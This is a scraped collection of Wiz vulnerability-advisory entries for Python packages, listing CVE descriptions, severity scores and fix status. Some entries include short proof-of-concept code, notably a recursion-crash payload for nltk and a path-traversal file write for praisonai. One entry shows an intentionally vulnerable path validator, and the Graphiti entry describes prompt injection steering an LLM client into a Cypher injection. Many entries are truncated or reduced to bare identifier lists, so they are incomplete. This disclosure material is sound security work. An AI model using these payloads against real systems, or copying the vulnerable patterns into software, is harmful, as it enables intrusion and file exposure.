CVE-2026-27483 [HIGH] CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27483 :
Python vulnerability analysis and mitigation
../
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 94.8
Exploitation Probability (EPSS) 16.3
Affected packages and libraries
mindsdb
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 25, 2026
Wiz
CVE-2026-30244 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-30244 [HIGH] CVE-2026-30244 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30244 :
Python vulnerability analysis and mitigation
Plane is an open-source project management tool. Prior to version 1.2.2, unauthenticated attackers can enumerate workspace members and extract sensitive information including email addresses, user roles, and internal identifiers. The vulnerability stems from Django REST Framework permission classes being incorrectly configured to allow anonymous access to protected endpoints. This issue has been patched in version 1.2.2.
Source : NVD
## 7.5
Score
Published March 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.8
Exploitation Probability (EPSS) N/A
Affe
Wiz
CVE-2026-33980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-33980 [HIGH] CVE-2026-33980 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33980 :
Python vulnerability analysis and mitigation
get_table_schema
sample_table_data
get_table_details
table_name
Source : NVD
## 8.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
adx-mcp-server
Sources
NVD
pip Severity HIGH No Fix Added at: Mar 29, 2026
Wiz
CVE-2026-31958 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-31958 [HIGH] CVE-2026-31958 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31958 :
Python vulnerability analysis and mitigation
Tornado is a Python web framework and asynchronous networking library. In versions of Tornado prior to 6.5.5, the only limit on the number of parts in multipart/form-data is the max_body_size setting (default 100MB). Since parsing occurs synchronously on the main thread, this creates the possibility of denial-of-service due to the cost of parsing very large multipart bodies with many parts. This vulnerability is fixed in 6.5.5.
Source : NVD
## 8.7
Score
Published March 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPS
Wiz
CVE-2026-0897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-0897 [HIGH] CVE-2026-0897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0897 :
Python vulnerability analysis and mitigation
Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.
Source : NVD
## 7.1
Score
Published January 15, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
CBL Mariner
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and librari
Wiz
CVE-2025-13780 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-13780 [CRITICAL] CVE-2025-13780 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-13780 :
Python vulnerability analysis and mitigation
pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data.
Source : NVD
## 8.8
Score
Published December 11, 2025
Severity HIGH
CNA Score 9.1
Affected Technologies
Python
pgAdmin
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 37.8
Exploitation Probability (EPSS) 0.2
Affected packages and libra
Wiz
CVE-2026-22607 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22607 [HIGH] CVE-2026-22607 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22607 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public
Wiz
CVE-2026-35615 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-35615 [CRITICAL] CVE-2026-35615 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35615 :
Python vulnerability analysis and mitigation
## Executive Summary:
..
normpath()
..
## Details:
_validate_path()
os.path.normpath()
..
'..'
..
src/praisonai-agents/praisonaiagents/tools/file_tools.py
```python
import os

class FileTools:
    """Tools for file operations including read, write, list, and information."""

    @staticmethod
    def _validate_path(filepath: str) -> str:
        # Normalize the path
        normalized = os.path.normpath(filepath)
        absolute = os.path.abspath(normalized)
        # Check for path traversal attempts (.. after normalization)
        # We check the original input for '..' to catch traversal attempts
        # Defect (this is the vulnerable version): os.path.normpath() already
        # collapses '..' segments (e.g. '/safe/../etc/passwd' -> '/etc/passwd'),
        # so the check below never sees them and the caller is never confined
        # to a base directory.
        if '..' in normalized:
            raise ValueError(f"Path traversal detected: {filepath}")
        return absolute
```
Severity: CRITICAL CVSS v3.1: 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/S
Wiz
CVE-2026-33230 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33230 [MEDIUM] CVE-2026-33230 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33230 :
Python vulnerability analysis and mitigation
nltk.app.wordnet_app
lookup_...
lookup_
word
Source : NVD
## 6.1
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nltk
open-webui
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity MEDIUM No Fix Added at: Mar 21, 2026
pip Severity MEDIUM Has Fix Added at: Mar 19, 2026
Wolfi Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-35536 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35536 [HIGH] CVE-2026-35536 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35536 :
Python vulnerability analysis and mitigation
In Tornado before 6.5.5, cookie attribute injection could occur because the domain, path, and samesite arguments to .RequestHandler.set_cookie were not checked for crafted characters.
Source : NVD
## 7.2
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-tornado
tornado
Sources
NVD
Debian 11, 14 Severity HIGH Has Fix Added at: Apr 03, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Apr 03, 2026
Echo Severity HIGH No Fix Added at: Apr 05, 202
Wiz
CVE-2026-26217 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## CVE-2026-26217: Python vulnerability analysis and mitigation
Crawl4AI versions prior to 0.8.0 contain a local file inclusion vulnerability in the Docker API deployment. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing unauthenticated remote attackers to read arbitrary files from the server filesystem. An attacker can access sensitive files such as /etc/passwd, /etc/shadow, application configuration files, and environment variables via /proc/self/environ, potentially exposing credentials, API keys, and internal application structure.
Source : NVD
Score 9.2
Published February 12, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2025-15346 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
## CVE-2025-15346: Python vulnerability analysis and mitigation
A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced.
Because the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag was not included, the behavior effectively matched CERT_OPTIONAL: a peer certificate was verified if presented, but connections were incorrectly authenticated when no client certificate was provided.
This results in improper authentication, allowing attackers to bypass mutual TLS (mTLS) client authentication by omitting a client certificate during the TLS handshake.
The issue affects versions up to and including 5.8.2.
Source : NVD
Score 9.3
Published January 8, 2026
Severity CRITICAL
CNA S
Wiz
CVE-2026-27025 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-27025: Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes and large memory consumption. This requires parsing the /ToUnicode entry of a font with unusually large values, for example during text extraction. This vulnerability is fixed in 6.7.1.
Source : NVD
Score 6.9
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python313-PyPDF2
pypdf
Sources
NVD
Cha
Wiz
CVE-2026-28413 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-28413: Python vulnerability analysis and mitigation
Products.isurlinportal is a replacement for isURLInPortal method in Plone. Prior to versions 2.1.0, 3.1.0, and 4.0.0, a url /login?came_from=////evil.example may redirect to an external website after login. This issue has been patched in versions 2.1.0, 3.1.0, and 4.0.0.
Source : NVD
Score 6.1
Published March 5, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
products.isurlinportal
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-27489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2026-27489: Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a path traversal vulnerability via symlink allows reading arbitrary files outside the model or user-provided directory. This issue has been patched in version 1.21.0.
Source : NVD
Score 8.7
Published April 1, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
onnx
Sources
NVD
Debian 11, 12, 13, 14 No Fix Added at: Apr 05, 2026
Echo No Fix Added at: Apr 0
Wiz
CVE-2026-27459 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
## CVE-2026-27459: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `set_cookie_generate_callback`
Source : NVD
Score 7.2
Published March 18, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
CBL Mariner
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localstack
rust-asn1_derive-devel
Sources
NVD
CBL-Mariner 3.0 Severity HIGH Has Fix Added at: Mar 29, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Container-Optimized OS Severity CRITICAL Has Fix Added at: Apr 02, 2026
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Ech
Wiz
CVE-2026-33718 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
## CVE-2026-33718: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `get_git_diff()`, `openhands/runtime/utils/git_handler.py:134`, `path`, `/api/conversations/{conversation_id}/git/diff`
Source : NVD
Score 7.6
Published March 27, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 53.6
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
openhands
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 26, 2026
Wiz
GHSA-rf74-v2fm-23pw Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## GHSA-rf74-v2fm-23pw: Python vulnerability analysis and mitigation
## Summary
Identifiers surviving from the summary: `JSONTaggedDecoder.decode_obj()`, `nltk/jsontags.py`, `sys.getrecursionlimit()`, `RecursionError`
## Affected code
`nltk/jsontags.py`:
```python
@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)
```
## Proof of Concept
```python
import sys, json
from nltk.jsontags import JSONTaggedDecoder

depth = sys.getrecursionlimit() + 50  # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth
# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
```
## Impact
Identifiers surviving from the impact section: `JSONTaggedDecoder`, `nltk/data.py`
## Suggested Fix
Add a depth parameter with a hard limit:
@
Wiz
GHSA-3rcm-vjrc-p45j Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## GHSA-3rcm-vjrc-p45j: Python vulnerability analysis and mitigation
## Summary
Identifiers surviving from the summary: `to_markdown()`, `to_html()`
## Details
...
Identifiers surviving from the details: `to_markdown()`, `html_passthrough=True`
## Proof of Concept
## General case
```python
from justhtml import JustHTML

doc = JustHTML(" ", fragment=True)
print(doc.to_html())
print()
print(doc.to_markdown())
```
Source : NVD
Score 5.3
Published March 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 19, 2026
Wiz
CVE-2026-28350 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
## CVE-2026-28350: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `lxml.html.clean`
Source : NVD
Score 6.1
Published March 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-lxml-html-clean
py3-lxml-html-clean
Sources
NVD
Alpine 3.21, 3.22 Severity MEDIUM No Fix Added at: Mar 10, 2026
Chainguard Has Fix Added at: Mar 10, 2026
Debian 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Echo Severity MEDIUM No Fix Added at: Mar 08, 2026
pip Severity MEDIUM Has Fix Added
Wiz
CVE-2026-39305 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## CVE-2026-39305: Python vulnerability analysis and mitigation
Identifiers surviving from the summary: `../`
## Details
Identifiers surviving from the details: `src/praisonai/praisonai/cli/features/action_orchestrator.py`, `target = workspace / step.target`, `_apply_step`, `workspace`, `step.target`, `FILE_CREATE`, `FILE_EDIT`
## PoC
Identifiers surviving from the PoC text: `ActionStep`
```python
from praisonai.cli.features.action_orchestrator import ActionStep, ActionType, ActionStatus

# Payload targeting a file outside the workspace
step = ActionStep(
    id="test_traversal",
    action_type=ActionType.FILE_CREATE,
    description="Malicious file write",
    target="../../../../../../../tmp/orchestrator_pwned.txt",
    params={"content": "pwned"},
    status=ActionStatus.APPROVED
)
# When the orchestrator applies this step, it writes to the traversed path
# _apply_step(step)
```
## Impact
~/.ssh/a
Wiz
CVE-2026-28438 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-28438: Python vulnerability analysis and mitigation
CocoIndex is a data transformation framework for AI. Prior to version 0.3.34, the Doris target connector didn't verify the configured table name before creating some SQL statements (ALTER TABLE). So, in the application code, if the table name is provided by an untrusted upstream, it exposes a SQL injection vulnerability when the target schema changes. This issue has been patched in version 0.3.34.
Source : NVD
Score 6.9
Published March 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-21439 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
## CVE-2026-21439: Python vulnerability analysis and mitigation
badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16.
Source : NVD
Score 2
Published January 6, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2026-27457 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-27457: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `AddonViewSet`, `weblate/api/views.py`, `queryset = Addon.objects.all()`, `get_queryset()`, `REQUIRE_LOGIN`, `GET /api/addons/`, `GET /api/addons/{id}/`
Source : NVD
Score 4.3
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2025-61492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
## CVE-2025-61492: Python vulnerability analysis and mitigation
A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input.
Source : NVD
Score 10
Published January 7, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 72.3
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
terminal-controller
Sources
NVD
pip Severity CRITICAL No Fix Added at: Jan 11, 2026
Wiz
CVE-2026-35044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
## CVE-2026-35044: Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the Dockerfile generation function generate_containerfile() in src/bentoml/_internal/container/generate.py uses an unsandboxed jinja2.Environment with the jinja2.ext.do extension to render user-provided dockerfile_template files. When a victim imports a malicious bento archive and runs bentoml containerize, attacker-controlled Jinja2 template code executes arbitrary Python directly on the host machine, bypassing all container isolation. This vulnerability is fixed in 1.4.38.
Source : NVD
Score 8.8
Published April 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public
Wiz
CVE-2026-21226 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-21226: Python vulnerability analysis and mitigation
Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network.
Source : NVD
Score 7.5
Published January 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Azure CLI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 82.2
Exploitation Probability (EPSS) 1.7
Affected packages and libraries
request-1276
az
Sources
NVD
Chainguard Has Fix Added at: Jan 21, 2026
pip Severity HIGH Has Fix Added at: Jan 14, 2026
MinimOS Severity HIGH Has Fix Added at: Feb 04, 2026
Wolfi Has Fix Added at: Jan 21, 2026
Wiz
CVE-2025-67511 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
## CVE-2025-67511: Python vulnerability analysis and mitigation
Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection, while username, host and port values are injectable. This issue does not have a fix at the time of publication.
Source : NVD
Score 9.6
Published December 11, 2025
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitatio
Wiz
CVE-2026-32247 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
## CVE-2026-32247: Python vulnerability analysis and mitigation
Graphiti is a framework for building and querying temporal context graphs for AI agents. Graphiti versions before 0.28.2 contained a Cypher injection vulnerability in shared search-filter construction for non-Kuzu backends. Attacker-controlled label values supplied through SearchFilters.node_labels were concatenated directly into Cypher label expressions without validation. In MCP deployments, this was exploitable not only through direct untrusted access to the Graphiti MCP server, but also through prompt injection against an LLM client that could be induced to call search_nodes with attacker-controlled entity_types values. The MCP server mapped entity_types to SearchFilters.node_labels, which then reached the vulnerable Cy
Wiz
CVE-2026-23986 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-23986: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `--UNSAFE,--trust`, `_preserve_symlinks: true`
Source : NVD
Score 6.9
Published January 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
copier
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 22, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 04, 2026
Nix Severity HIGH Has Fix Added at: Feb 04, 2026
Wiz
CVE-2023-7333 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
## CVE-2023-7333: Python vulnerability analysis and mitigation
A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component.
Source : NVD
Score 4.8
Published January 7, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rec
Wiz
GHSA-r48f-3986-4f9c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-r48f-3986-4f9c: Python vulnerability analysis and mitigation
## Our analysis
Identifiers surviving from the analysis: `UnusedVariables`
## Original report
Title: UnusedVariables analysis bypass via BUILD opcode Arbitrary File Read through fickling.load()
## Summary
Two independent bugs in fickling's AST-based static analysis combine to allow a malicious pickle file to execute arbitrary stdlib function calls - including reading sensitive files - while check_safety() returns Severity.LIKELY_SAFE and fickling.load() completes without raising UnsafeFileError.
A server using fickling.load() as a security gate before deserializing untrusted pickle data (its documented use case) is fully bypassed. The attacker receives the contents of any file readable by the server process as the return value of fickling.load().
Wiz
CVE-2026-4270 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## CVE-2026-4270: Python vulnerability analysis and mitigation
Improper Protection of Alternate Path in the no-access and workdir feature of the AWS API MCP Server versions >= 0.2.14 and < 1.3.9 on all platforms may allow the bypass of intended file access restrictions and expose arbitrary local file contents in the MCP client application context.
To remediate this issue, users should upgrade to version 1.3.9.
Source : NVD
Score 6.8
Published March 16, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
awslabs.aws-api-mcp-server
Sources
NV
Wiz
CVE-2025-53000 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
## CVE-2025-53000: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `inkscape.bat`, `jupyter nbconvert --to pdf`
Source : NVD
Score 8.5
Published December 17, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
py3-nbconvert
nbconvert
Sources
NVD
Chainguard Has Fix Added at: Jan 30, 2026
Debian 11, 12, 13, 14 No Fix Added at: Dec 21, 2025
Echo No Fix Added at: Dec 21, 2025
pip Severity HIGH Has Fix Added at: Dec 21, 2025
Wolfi Has Fix Added at: Jan 30, 2026
Wiz
CVE-2025-67729 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
## CVE-2025-67729: Python vulnerability analysis and mitigation
LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.
Source : NVD
Score 8.8
Published December 26, 2025
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.2
Exploitation Probability (EPSS)
Wiz
CVE-2026-23996 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
## CVE-2026-23996: Python vulnerability analysis and mitigation
FastAPI Api Key provides a backend-agnostic library that provides an API key system. Version 1.1.0 has a timing side-channel vulnerability in verify_key(). The method applied a random delay only on verification failures, allowing an attacker to statistically distinguish valid from invalid API keys by measuring response latencies. With enough repeated requests, an adversary could infer whether a key_id corresponds to a valid key, potentially accelerating brute-force or enumeration attacks. All users relying on verify_key() for API key authentication prior to the fix are affected. Users should upgrade to version 1.1.0 to receive a patch. The patch applies a uniform random delay (min_delay to max_delay) to all responses regard
Wiz
GHSA-vmwq-8g8c-jm79 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## GHSA-vmwq-8g8c-jm79: Python vulnerability analysis and mitigation
## Impact
Identifiers surviving from the impact section: `save_report`, `openchatbi/tool/save_report.py`, `file_format`, `file_format.lstrip(".")`, `/../../`, `__init__.py`
## Patches
Affected versions: <=0.2.1
Patched versions: 0.2.2 (includes fix from PR #12: https://github.com/zhongyu09/openchatbi/pull/12)
## Workarounds
No
## References
Issue #10: https://github.com/zhongyu09/openchatbi/issues/10
PR #12: https://github.com/zhongyu09/openchatbi/pull/12
Source : NVD
Score 8.7
Published March 2, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
